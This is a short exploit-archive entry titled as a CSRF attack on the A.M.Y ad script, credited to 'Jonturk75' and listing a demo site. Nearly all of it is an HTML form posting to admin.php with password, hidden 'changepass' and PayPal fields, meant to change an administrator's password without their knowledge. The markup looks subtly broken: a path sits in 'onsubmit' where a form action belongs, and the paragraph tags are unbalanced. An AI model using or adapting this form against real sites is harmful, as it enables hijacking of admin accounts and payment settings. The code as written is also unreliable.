# Exploit Title: A.M.Y CSRF (change admin password) # Author: Jonturk75 # Category:: webapps # Demo site: http://calendarscripts.info/demos/amy/admin.php <form onsubmit="amy/admin.php;" method="post"> <input type="password" size="30" name="adminpass"/></p> <input type="password" size="30" name="repass"/></p> <input type="hidden" value="1" name="changepass"/> <p><input type="checkbox" checked="" value="1" name="email_on_signup"/> Email me when a new advertiser signs up.</p> <input type="text" size="30" value="paypal@mysite.com" name="paypal"/></p> <p align="center"><input type="submit" value="Save Settings"/></p>